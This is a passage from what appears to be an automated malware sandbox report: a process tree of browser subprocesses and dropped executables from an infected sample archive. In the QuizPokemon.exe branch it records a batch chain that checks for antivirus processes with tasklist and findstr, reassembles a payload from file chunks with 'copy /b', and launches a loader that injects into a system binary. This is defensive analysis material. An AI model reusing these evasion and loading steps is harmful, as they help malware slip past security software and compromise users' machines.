    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8
    3⤵
    PID:3124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:8
    3⤵
    PID:6024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
    3⤵
    PID:1308
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
    3⤵
    PID:5736
- C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe
  "C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe"
  2⤵
  - Executes dropped EXE
  PID:6040
- C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe
  "C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"
  2⤵
  - Executes dropped EXE
  PID:5600
- - C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe
    "C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
  2⤵
  - Enumerates system info in registry
  PID:5736
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfc29cc40,0x7ffdfc29cc4c,0x7ffdfc29cc58
    3⤵
    PID:6112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --disable-http2 --use-spdy=off --disable-quic
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8
    3⤵
    PID:5124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2068 /prefetch:2
    3⤵
    PID:200
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=2144 /prefetch:3
    3⤵
    PID:4144
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=2780 /prefetch:8
    3⤵
    PID:1376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
    3⤵
    PID:5248
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
    3⤵
    PID:5144
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
    3⤵
    PID:1352
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=4764 /prefetch:8
    3⤵
    PID:6092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1
    3⤵
    PID:3952
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5516 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:6052
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5200 /prefetch:8
    3⤵
    PID:1652
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=3732 /prefetch:8
    3⤵
    PID:6288
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
    3⤵
    PID:6392
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
    3⤵
    PID:6400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
    3⤵
    PID:6788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
    3⤵
    PID:7100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
    3⤵
    PID:6772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
    3⤵
    PID:6780
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
    3⤵
    PID:6392
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
    3⤵
    PID:6932
- C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
  "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"
  2⤵
  - Executes dropped EXE
  PID:6872
- C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
  "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:6736
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4176
- C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe
  "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6384
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1772
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:3796
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4668
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:6392
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:4572
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 812297
      4⤵
      System Location Discovery: System Language Discovery
      PID:6704
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g
      4⤵
      System Location Discovery: System Language Discovery
      PID:6752
  - - C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
      812297\Shopzilla.pif 812297\g
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:6544
    - - C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
        
        C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:4344
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 15
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:7132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:6296
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfb63cc40,0x7ffdfb63cc4c,0x7ffdfb63cc58
    3⤵
    PID:6416
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1740,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1720 /prefetch:2
    3⤵
    PID:5784
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2096,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3
    3⤵
    PID:1392
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2156,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:8
    3⤵
    PID:7092
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3064 /prefetch:1
    3⤵
    PID:488
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1
    3⤵
    PID:4544
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3492,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4384 /prefetch:1
    3⤵
    PID:2836
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4660 /prefetch:1
    3⤵
    PID:6744
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4288,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:8
    3⤵
    PID:4564
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:8
    3⤵
    PID:5864
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3576,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:8
    3⤵
    PID:6104
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3064,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:1
    3⤵
    PID:5288
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4700,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:1
    3⤵
    - Drops file in Program Files directory
    PID:2972
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4944,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:1
    3⤵
    - Drops file in Program Files directory
    PID:4680
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:1
    3⤵
    - Drops file in Program Files directory
    PID:6648
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=2272,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4308 /prefetch:1
    3⤵
    - Drops file in Program Files directory
    PID:5656
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3500,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2236 /prefetch:1
    3⤵
    - Drops file in Program Files directory
    PID:6840
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3496,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:1
    3⤵
    - Drops file in Program Files directory
    PID:6896
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4232,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5192 /prefetch:8
    3⤵
    - Drops file in Program Files directory
    PID:6228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5412,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5332 /prefetch:1
    3⤵
    - Drops file in Program Files directory
    PID:6508
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5136,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:1
    3⤵
    - Drops file in Program Files directory
    PID:4564
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=4400,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3340 /prefetch:1
    3⤵
    PID:3248
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3420,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:1
    3⤵
    PID:7148
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5052,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4896 /prefetch:1
    3⤵
    PID:1368
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5072,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3836 /prefetch:1
    3⤵
    PID:4320
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5080,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1
    3⤵
    PID:5824
- C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe
  "C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - System policy modification
  PID:6488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
  2⤵
  PID:3560
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfbd3cc40,0x7ffdfbd3cc4c,0x7ffdfbd3cc58
    3⤵
    PID:6740
- - C:\Program Files\Google\Chrome\Application\chrome.exe
